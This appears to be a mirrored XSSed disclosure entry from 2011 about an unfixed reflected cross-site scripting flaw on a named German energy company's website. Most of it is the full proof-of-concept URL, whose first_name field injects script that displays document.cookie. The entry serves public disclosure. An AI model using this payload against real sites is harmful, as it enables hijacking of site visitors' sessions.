Unfixed XSS vulnerability at www.vattenfall.de

2011-01-16T00:00:00
ID XSSED:71715
Type xssed
Reporter kabelbrand
Modified 2012-10-01T00:00:00

Description

Security researcher kabelbrand, has submitted on 16/01/2011 a cross-site-scripting (XSS) vulnerability affecting www.vattenfall.de, which at the time of submission ranked 59442 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 10/01/2012. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.vattenfall.de/de/subscriptionForm.xml?current-page=%2Fde%2Fpresse-aboservice.htm&sendpageUrl=presse-aboservice.htm&subscriptionList=3981C1ACFE604763966A661C88FA1922.xml&subscriptionTimestamp=20%3A35%3A13%3A59&action=subscribe&subscribeHeadline=Anmeldung&unsubscribeHeadline=Abmeldung&first_name_input=mandatory&first_name=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&surname_input=mandatory&surname=&telephone_input=visible&telephone=&fax_input=visible&fax=&company_input=visible&company=&street_input=visible&street=&house_nr_input=visible&house_nr=&zip_code_input=visible&zip_code=&city_input=visible&city=&email_input=mandatory&email=&stf_categorylist=Bergbau|+Energiepolitik|+Gesellschaft%2FSport%2FKultur|+Innovation+%26+Umwelt|+Netz%2FHandel%2FIT&categories_nr=1%3B2%3B3%3B4%3B5&subscription_link_text=Schalten+Sie+nun+Ihr+Abonnement+frei!&unsubscription_link_text=Beenden+Sie+jetzt+Ihr+Abonnement!&leading_message_text=Sie+haben+sich+f%C3%BCr+das+Abonnement+von+Aboservice+mit+folgenden+Daten+registriert%3A&trailing_message_text_subscription=Zum+Abbestellen+gen%C3%BCgt+es%2C+Ihre+E-Mail-Adresse+in+das+Formular+unserer+Internet-Abo-Seite+einzugeben+und+auf+%22Abbestellen%22+zu+klicken.+Ihre+Daten+%C3%A4ndern+Sie%2C+indem+Sie+dort+ebenfalls+Ihre+E-Mail-Adresse+plus+die+neuen+Daten+angeben.%3CBR%3E%3CBR%3EBeachten+Sie+auch+unsere+Hinweise+zum+Datenschutz.&trailing_message_text_unsubscription=Ihre+Daten+%C3%A4ndern+Sie%2C+indem+Sie+dort+ebenfalls+Ihre+E-Mail-Adresse+plus+die+neuen+Daten+angeben.+%3CBR%3E%3CBR%3EBeachten+Sie+auch+unsere+Hinweise+zum+Datenschutz.&Absenden.x=64&Absenden.y=13&Absenden=submit